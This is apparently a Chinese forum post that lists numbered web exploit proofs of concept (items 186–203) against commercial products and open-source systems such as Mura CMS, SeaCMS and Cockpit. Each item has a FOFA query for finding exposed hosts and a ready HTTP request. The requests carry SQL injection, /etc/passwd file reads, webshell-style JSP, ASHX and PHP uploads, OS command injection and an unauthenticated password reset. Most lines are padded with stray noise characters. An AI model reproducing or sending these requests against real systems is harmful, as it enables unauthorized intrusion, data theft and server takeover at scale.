) d! |+ o3 E4 [3 K. p- BGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1' e) x0 g9 _, U$ x4 k2 |4 n( @
Host: host
7 t8 v6 a3 F/ u5 m* x2 T6 `
, T3 ?% k4 w! T0 T$ k
( y3 }% W/ g" ~9 ?: V186. F-logic DataCube3 SQL注入
* S% O: _* Y# z& O/ XCVE-2024-317504 O# g% n3 B, [
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
" {. L1 @. E% Y6 }$ UFOFA:title=="DataCube3"( F* T. L) A7 n8 F
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
2 Q4 w0 t; S; I. rHost: your-ip7 b; ^" g' ^, h" P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
# {6 T0 d- D+ ?! B1 O2 v, L; iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8% L" m4 h7 E& u% ?) e8 N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 S, V5 f! R9 c% t
Accept-Encoding: gzip, deflate! G+ y9 s9 }. E+ M/ u# j
Connection: close: r9 ]6 O' k- J
Content-Type: application/x-www-form-urlencoded3 M1 {7 P& v- D& K% l1 N
" u" P, n q) {' B" E+ w, ireq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
' ?+ W! t9 V* D9 @; n2 \
2 ?& a3 K4 k6 R, U* D/ X5 ]* C4 P% N1 y7 p
187. Mura CMS processAsyncObject SQL注入
7 y/ p L7 f4 q" d; }CVE-2024-32640
: g6 }0 Y4 E; kFOFA:"Mura CMS"
w w( Z. c: _ ]POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: V- s: ?8 t+ B; EHost: your-ip
9 v$ L( H' P% [0 \( a! eContent-Type: application/x-www-form-urlencoded$ D7 R; ^+ d* c) `! ]# j6 Z
i/ ~- F. Z& c5 a# a; @$ Z
5 X4 N2 t9 u, V& g* C4 Fobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
' P# q7 z+ \: F/ [( e! R8 _& h5 @2 l7 T4 K0 J. \3 k
( ]5 R1 H/ I6 ^5 H( B& P5 U" Q188. 叁体-佳会视频会议 attachment 任意文件读取
8 ~; c( s9 J5 hversion <= 3.9.7
% a6 e. M8 P- b, _1 |0 |6 BFOFA:body="/system/get_rtc_user_defined_info?site_id"6 l8 L# E3 o& T a7 G8 H
GET /attachment?file=/etc/passwd HTTP/1.10 B4 k" V* u. Y* P" v
Host: your-ip
5 C8 }& E5 P$ R& O tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ v, ^/ o8 M# G0 O% d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ q$ [9 U$ S* n3 t
Accept-Encoding: gzip, deflate1 W+ W' @8 c0 w" ^9 R: \
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 e3 P# h, ]% J9 [4 RConnection: close
/ p+ Z( Z# i. m9 H/ C) l3 K2 W0 q, r3 _( J! c. H8 b' z% O
) S5 R9 [6 {6 C1 a6 [, g8 M) X189. 蓝网科技临床浏览系统 deleteStudy SQL注入
: h2 Y% w" I! XFOFA:app="LANWON-临床浏览系统"0 |$ d, n( J1 m7 O! C
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
c; D J+ G- `5 J, wHost: your-ip
0 ~# v1 y; k7 g' i: tUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! I& c7 r" ` t; v. n& XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ O4 J- u" V: t
Accept-Encoding: gzip, deflate
/ |5 p- J# b& e- AAccept-Language: zh-CN,zh;q=0.9& S5 l% g' ~; s, B. ~
Connection: close8 Z/ u8 J4 f, y2 ]3 y
: A5 _( q' i( a( R. w; E& C
! G& j, }4 i0 f
190. 短视频矩阵营销系统 poihuoqu 任意文件读取! D) `8 [( H: [- u8 z0 v
FOFA:title=="短视频矩阵营销系统"
* P" i$ z, c% g1 W7 j! b9 Z9 z2 sPOST /index.php/admin/Userinfo/poihuoqu HTTP/2! {/ ]' h* w" I! ~2 h
Host: your-ip0 @, U) b" S7 f7 C7 y- i' Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
" z& A% F6 e' I: SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: d1 C9 w t# R7 ^! O/ M6 N
Content-Type: application/x-www-form-urlencoded
$ X. X) q- t, ~$ t0 M4 PAccept-Encoding: gzip, deflate
t# x2 m+ ]7 s6 M- N1 XAccept-Language: zh-CN,zh;q=0.9
( v7 J1 F+ n* D5 \0 ]. `; z. L7 e. t6 [7 S
poi=file:///etc/passwd; d( ` A% V5 v5 @0 j6 E
1 ?" r" ?6 d/ \* ~# X4 k: M1 n' ?
; R3 ?/ t. @- ]& _: x. u8 Q' `8 h3 L- G191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& k( s% ?. o. N- j0 \ F
FOFA:body="/CDGServer3/index.jsp": U% a% C4 U6 D3 P9 [/ X) |
POST /CDGServer3/js/../NavigationAjax HTTP/1.1* ?! V- @: V& E; ?7 p3 N
Host: your-ip) z2 m7 V7 j8 U+ a# ^2 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 ^& F$ ]/ v: kContent-Type: application/x-www-form-urlencoded
: @! B% |% b- V# K0 |! @1 l- e
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=. ^ E+ y- { l# c
* i5 k- F7 M5 ?8 }! v# B0 i
9 F( c. H F w- b
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传$ J' l, _, [8 P% `7 z& j7 y
FOFA:title="用户登录_富通天下外贸ERP"
r l( H: V% ^7 b% RPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.10 `* |, X/ E$ }- g
Host: your-ip l7 [; [, C! S1 I4 q5 @) X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; e: s. Y8 o4 ~! a- \Content-Type: application/x-www-form-urlencoded0 ~( p( P+ M) v
! j, V* B. H1 u2 g/ B
3 Y* ~ I1 b$ z0 P<% @ webhandler language="C#" class="AverageHandler" %>
4 \5 N# f0 d; \3 C0 h4 _8 f( `3 Ausing System;( |) k2 K' m6 t W1 {
using System.Web;
. `* _ m) n6 Q* [* {9 Opublic class AverageHandler : IHttpHandler ]3 I6 C8 K* d9 n4 ~: r8 F
{; m3 v3 y5 }+ @, a9 T
public bool IsReusable
3 C% \) w4 x) [{ get { return true; } }" {- j. i; M1 l# b3 M% h5 j( h
public void ProcessRequest(HttpContext ctx)7 I+ N- e# m9 n+ O: M
{' W; J3 ~5 g4 |4 i5 H* x
ctx.Response.Write("test");2 o, q3 x! ]2 n$ j' e& D) X( ?. O
}
* b" X6 m) c" M3 @+ j% e# A# l}/ V4 V) f; ~4 W
2 o1 p( P# U3 O, G( s! {- m# F3 Y
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
/ n0 w) c& `/ T, |+ g+ E' [FOFA:body="山石云鉴主机安全管理系统"
2 I3 _( A$ a/ FGET /master/ajaxActions/getTokenAction.php HTTP/1.1: Y T0 \ W0 z. c" p
Host:5 Y6 |3 j; I5 R) p
Cookie: PHPSESSID=2333333333333;6 {( L+ w/ n, e2 O
Content-Type: application/x-www-form-urlencoded
+ {0 ~' M v# \0 DUser-Agent: Mozilla/5.0& K1 i g9 C# o2 W
# |+ n! B3 F/ c; z$ R5 e! ?6 Q
& D1 \3 }) h/ Q* u- G" S* |
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1$ \; y+ `, p& E5 `. g
Host:
: W: D0 Z2 g) N2 p4 k/ aUser-Agent: Mozilla/5.06 D: C! S; K( X! w( a4 `
Accept-Encoding: gzip, deflate% _) W( m- D7 E* v4 I2 S
Accept: */*
4 C4 U* Q6 O4 P4 i1 Y* x& a4 k* gConnection: close" c4 ^5 m4 C7 l- E& ~6 p- d
Cookie: PHPSESSID=2333333333333;
2 F0 g8 Q* q5 ~8 bContent-Type: application/x-www-form-urlencoded
2 `/ {. C; s7 \2 Z1 }2 r$ A5 D) kContent-Length: 84! k! g# ?1 |' ^
/ T9 k( @/ }- `/ n7 h
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
* {+ s/ k3 i* h Y
+ p8 F# Y! u5 g9 ~) Z3 }+ ~( F4 T. O7 D
GET /master/img/config HTTP/1.1+ {" ~. o) ^: g. F: l6 J" W
Host:
4 N: m6 Z# H/ I$ p6 aUser-Agent: Mozilla/5.01 V+ x [ D0 Q O5 [: i H
7 R* C) ?0 n/ E6 {& l5 k' v g
+ \# o( P5 M7 E+ c, n9 C
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
' G% |2 A4 T$ \( G$ F: b- M! bFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在4 \$ Q8 T( n& L# q% e; }2 w" R
0 ?( @( ]) C5 dPOST /servlet/uploadAttachmentServlet HTTP/1.1
7 d. i9 i/ l0 a6 I$ c8 pHost: host: D% ?- @) \, g( A- N& H7 ]4 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
% Q% q: V& T9 e- k6 E5 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* {6 H4 n9 z2 F3 Y) b4 W7 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 S& R" ^- g [2 P
Accept-Encoding: gzip, deflate
) M- ?# f! U/ oConnection: close
: M% m1 n% r' t& KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
7 P; z3 @2 r: b% c9 Q( X. V------WebKitFormBoundaryKNt0t4vBe8cX9rZk
% Q% F" w: z0 I6 R6 ~( Q; z( r6 ]- p& r
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
0 b. p t" O- h# UContent-Type: text/plain
, _7 z) l4 M* p- n8 L( N3 a3 Q<% out.println("hello");%>
1 K1 `7 w& s/ W------WebKitFormBoundaryKNt0t4vBe8cX9rZk
5 h5 ]" O& g" z3 q( `4 uContent-Disposition: form-data; name="json"
- | e8 @6 D2 z9 B. t {"iq":{"query":{"UpdateType":"mail"}}}
$ r8 N0 V( a2 |+ C4 h; r------WebKitFormBoundaryKNt0t4vBe8cX9rZk--% C6 L: l; p8 V2 n1 q7 }
3 s; A- l- l* o# ]1 U9 { m
9 D8 ~9 }" `! y0 N195. 飞鱼星上网行为管理系统 send_order.cgi命令执行, f4 d7 U, z2 \5 l1 r' v
FOFA:title=="飞鱼星企业级智能上网行为管理系统- V9 `$ J4 {5 ]4 ~ V5 y
POST /send_order.cgi?parameter=operation HTTP/1.1
5 W- ?* E3 k( H) x8 Q; BHost: 127.0.0.1/ z2 u6 r% T1 ^; ?% }0 X. z
Pragma: no-cache# [ O2 @' X' p( b/ ~2 s' ^
Cache-Control: no-cache
8 ^ I5 F' Z ^9 O- MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: r4 z' y( f" n1 n( s0 J
Accept: */*
8 Q* T+ q% T a1 b7 {Accept-Encoding: gzip, deflate- g! S$ _3 `; A& [$ s9 t6 M5 u+ _
Accept-Language: zh-CN,zh;q=0.9
" z. }4 Y; M/ r3 T" a# b& XConnection: close& e0 ?, `' ?1 e% M* I
Content-Type: application/x-www-form-urlencoded
5 L" c0 p+ A% X. e8 D# G/ a2 JContent-Length: 68& j* C8 V) P0 w7 v! H2 S
0 U8 { U! g8 q# Q% N: r{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}: K, R% g0 P/ k2 ?5 `
( o: A! h$ _% T6 k1 S6 S) k
$ y ~: h/ o* i9 w: |( @: e196. 河南省风速科技统一认证平台密码重置
$ f% q6 `6 ?0 D. r1 HFOFA:body="/cas/themes/zbvc/js/jquery.min.js"+ N4 H4 o) |' D2 [* Q7 i2 v
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
1 U) S# K9 }. Q" nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. a) D* U5 ]( L2 h) _+ P) i) \Content-Type: application/json;charset=UTF-8 F" q5 `6 A( _$ n
X-Requested-With: XMLHttpRequest
3 `" x$ ~8 \: p' X; b( cHost:
) o+ V7 k) l0 e1 kAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2. ~ k4 y4 {/ f3 q; e! q
Content-Length: 457 c& Z& g& ^+ k ~& [
Connection: close |/ t) M. B& B8 t0 \) L7 ?
9 L" Q- A0 v9 Z9 o
{"xgh":"test","newPass":"test666","email":""}1 J r/ M7 K- l0 E0 p% J
: M2 V" _4 V' p, P7 G! e/ Z% `. v/ `+ [6 `! s
$ E; z. q/ N8 \4 P8 |% i
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入3 `" B; U6 G, P1 m+ I
FOFA:app="浙大恩特客户资源管理系统"
c2 ]# }9 h# K8 m2 Y9 n3 dGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
+ b V- X" Q6 ^Host:
0 B. V- S) Y+ S9 e$ A" D! UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
& U+ C+ B w* u8 hAccept-Encoding: gzip, deflate5 e" R( |) ?% c% R. y
Connection: close
& h( a2 ?) F, C9 [6 R3 D
/ H/ S8 c/ D: _) o& t
3 {& R) L2 V* E# f( J) Q8 i, {' j0 S- _& G5 W" c* m. d3 q* y/ l
198. 阿里云盘 WebDAV 命令注入
3 |! x+ E+ J, i! i. ~& sCVE-2024-29640' j% ]* Z: ]: S. N
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.12 e0 O/ Z4 |& f& f$ k
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64( I) z5 ]8 {; I4 x
Accept: */*2 x/ M Q% z `, b
Accept-Encoding: gzip, deflate( X9 _4 a- l/ F2 _& V0 L! e# Y6 e X
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6, ~. R* X. w, g$ F+ {# K
Connection: close4 ?0 U! l5 ?3 `' t- G1 W. Y/ r
% h. k3 g( h( B9 M7 n
! u# ]! R& N0 G4 x199. cockpit系统assetsmanager_upload接口 文件上传
/ [* u8 ^- F! G" k4 j6 c6 Y3 \- @; o9 p/ Y7 `
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:5 R% B0 X& e( G4 Z" W1 k. Y
GET /auth/login?to=/ HTTP/1.1) J: K6 Y$ d, y% `* @4 Y
1 A3 Z% ?+ Z$ _9 }: r2 G' l
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
( s" ?) i/ {7 @0 W) o5 Y. {$ g8 |, ^" X
2.使用刚才上一步获取到的jwt获取cookie:( L5 A. o# R6 S, c2 K4 m: I$ r
0 }* a: G9 h3 r; C: }+ [
POST /auth/check HTTP/1.1
9 C" i# w- Z b [# h. x# @Content-Type: application/json3 W( [8 i% d8 p! x7 U
# P6 o, H2 Q5 i1 s
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}1 r3 ?' z$ x) i* a! ~
0 b; o* T4 h% k
响应:200,返回值:
^. K2 R3 E3 u$ k/ S6 w/ q- A2 oSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/9 H; e: t- _: v8 k! `2 x; t7 ~
Fofa:title="Authenticate Please!"
* u8 X# G( N7 {, p q* |+ @POST /assetsmanager/upload HTTP/1.1" L$ Y! j% |/ ^2 c1 |! N
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
! [4 d- |, m; A* aCookie: mysession=95524f01e238bf51bb60d77ede3bea921 f7 V; H, F! J
3 \- r H9 W e2 U q g
-----------------------------36D28FBc36bd6feE7Fb3
" W: j# M" Z- Q. A+ x sContent-Disposition: form-data; name="files[]"; filename="tttt.php"5 M( `. C6 V2 M1 L7 B
Content-Type: text/php" U k; [: F, v" I1 V! U) {
/ t+ Y6 v1 [7 _7 T
<?php echo "tttt";unlink(__FILE__);?>% N( U5 y0 Q8 j4 }
-----------------------------36D28FBc36bd6feE7Fb31 K% B! d7 w, `* G+ E# }: j
Content-Disposition: form-data; name="folder"8 X8 |" }0 P7 v5 {8 K( G# Q
* @; i+ k/ g6 A! Y* A-----------------------------36D28FBc36bd6feE7Fb3--. h! E4 i' }& M B" z& D: i
4 J/ W) o- b( x
8 z" Q7 I6 _4 V c
/storage/uploads/tttt.php% A" j- \0 B5 p+ [! i; q
5 A9 n9 G; X' ]. f+ \$ N5 B, S- l
200. SeaCMS海洋影视管理系统dmku SQL注入
) ]3 g" ]/ a) u4 u$ J' Z) m1 jFOFA:app="海洋CMS"
- s @" D7 T9 a* dGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1, |1 X( ?" V3 \: U
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
8 s6 K! S* g h/ [ ~$ V( DUpgrade-Insecure-Requests: 1
7 ` e: h5 h% E% ?( W) i$ Q1 `4 hCache-Control: max-age=0
0 H! o3 O" W) p& z, ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 i' r5 `$ v+ pAccept-Encoding: gzip, deflate, F2 s" W6 m' U. m a/ {
Accept-Language: zh-CN,zh;q=0.98 f H8 i0 w+ u. z" D. ]0 Z: R
R1 Q$ o) w v/ t% g
/ @, D+ G$ O" E T" v! @201. 方正全媒体新闻采编系统 binary SQL注入
# X/ G% R" U6 M2 L2 RFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
8 [- g9 F7 b: _& \POST /newsedit/newsplan/task/binary.do HTTP/1.1
f2 X* i R l* A( Z1 MContent-Type: application/x-www-form-urlencoded9 H* B* a( ?4 r- e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 V* a h2 z1 l6 A( y1 j
Accept-Encoding: gzip, deflate5 {! }& z8 F/ _! w i6 z& A
Accept-Language: zh-CN,zh;q=0.9
. I& [/ g- R9 e* Q5 SConnection: close7 s+ d1 u8 v$ \$ s9 [/ s8 W
/ t2 N0 ]& S% p
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1; L, Z: ?' H7 Z6 n, L
3 {6 }- R# E' o. `* ?! v
6 V q- j, W! Q9 ^202. 微擎系统 AccountEdit任意文件上传
$ P2 x/ w- Y3 S) k9 c/ F, H. Z9 NFOFA:body="/Widgets/WidgetCollection/"
* x1 C& |) J' z获取__VIEWSTATE和__EVENTVALIDATION值
0 }4 m0 t, ]4 s( T& U6 BGET /User/AccountEdit.aspx HTTP/1.1# |( i- q- j; K2 n1 D7 \; k
Host: 滑板人之家$ b4 n( E$ ]( P0 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31/ \& o& V) B* O U, Y. b0 a' e+ W
Content-Length: 08 q8 a: N6 [, \& L
1 c9 U, u4 `; \" Z
( f) F2 _) j2 \9 `" ^
替换__VIEWSTATE和__EVENTVALIDATION值
% n& A4 `0 g r# J7 S" o1 w% rPOST /User/AccountEdit.aspx HTTP/1.1 X3 ?) U( a4 ~; r
Accept-Encoding: gzip, deflate, br* N4 `! o4 C! i6 F
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
6 G) m/ g) ^# Q
, r6 _( p2 E0 s0 m7 f/ u- J-----------------------------786435874t38587593865736587346567358735687" _6 n7 ?* L0 X
Content-Disposition: form-data; name="__VIEWSTATE"
; m" T6 E A/ w: N+ i* E" |; B/ _+ W4 u0 r# G( D! r; P
__VIEWSTATE/ t' Q {) A4 x4 B6 ]/ N1 P
-----------------------------786435874t38587593865736587346567358735687
% B$ y, A6 w# l: Z5 [ NContent-Disposition: form-data; name="__EVENTVALIDATION"
4 s: F( I/ h7 K8 ^! {1 o; e: O- ^
__EVENTVALIDATION
3 T" P5 T7 ~3 E! T-----------------------------786435874t38587593865736587346567358735687
. F8 {" O( a8 d6 oContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
# i7 I6 ~2 w# }# c) }9 ]Content-Type: text/plain
! E. t) D* M1 s% [. i# I- b
& o; `0 H9 N4 z. J4 [6 x) ?Hello World!
( i7 d& S% |9 U+ p t-----------------------------786435874t38587593865736587346567358735687- F; z1 D* h* Q) y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
% \1 W# p, Y4 B* q" k2 L+ r. a+ E7 B( u5 r& E* U
上传图片9 g& @6 I: T) r& S8 S
-----------------------------786435874t38587593865736587346567358735687
! a; s+ f2 a# B+ A9 yContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"/ `7 d% d8 h4 ?! |, r) |( B
& D u7 w' t- T2 l+ p ]
* W7 i& ?5 x# R! Q0 w; s-----------------------------786435874t38587593865736587346567358735687
. ] i$ r2 A/ v; u' G3 LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
, ^7 x1 n, [) F6 N
. K3 Y- c# E% n7 Z
6 A# g0 w% E9 \-----------------------------786435874t38587593865736587346567358735687--
9 h2 n4 [& ?/ M# b/ i' J% K3 H% Y! c1 u, M- Z
& J0 W- U1 e( f8 h
/_data/Uploads/1123.txt
9 n4 l! Y: V9 {1 E8 }8 N! B* X ?2 t
9 G; ?! n; _$ K0 Y n203. 红海云EHR PtFjk 文件上传
( \/ j1 ^. O" UFOFA:body="RedseaPlatform"1 _+ i) C3 i6 j4 n
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
" {7 O- N- T, { g% }Host: x.x.x.x# b" w# o9 C& c. a+ v
Accept-Encoding: gzip$ n& ]. k D& Z4 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 j9 R; J; r* W$ Y4 N; N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys48 o; S8 O+ i3 q) N( F
Content-Length: 2104 h8 @3 e% o9 N
+ v& I+ u5 z1 i------WebKitFormBoundaryt7WbDl1tXogoZys4 a; Z0 u. s% B3 P# L9 q: |
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
- H8 T+ c% E9 l9 R, GContent-Type:image/jpeg
2 W) O$ L8 D' k
! s4 t7 l' @ N$ K' L l6 D<% out.print("hello,eHR");%>
$ r" j- V$ L* n9 l% y7 h------WebKitFormBoundaryt7WbDl1tXogoZys4--
( L% O/ \, \, O3 S2 L& }
. O Q I r G. P O+ l( X
4 i$ |) ~$ s5 w, D) I, Z4 w' H- l7 ^2 k& Q/ @8 x
: k+ C' G U! S: }
1 v. Z4 b6 N2 p3 ]; M* ]0 R5 ]
|
发表于 2024-6-5 14:31:29
收藏
支持
反对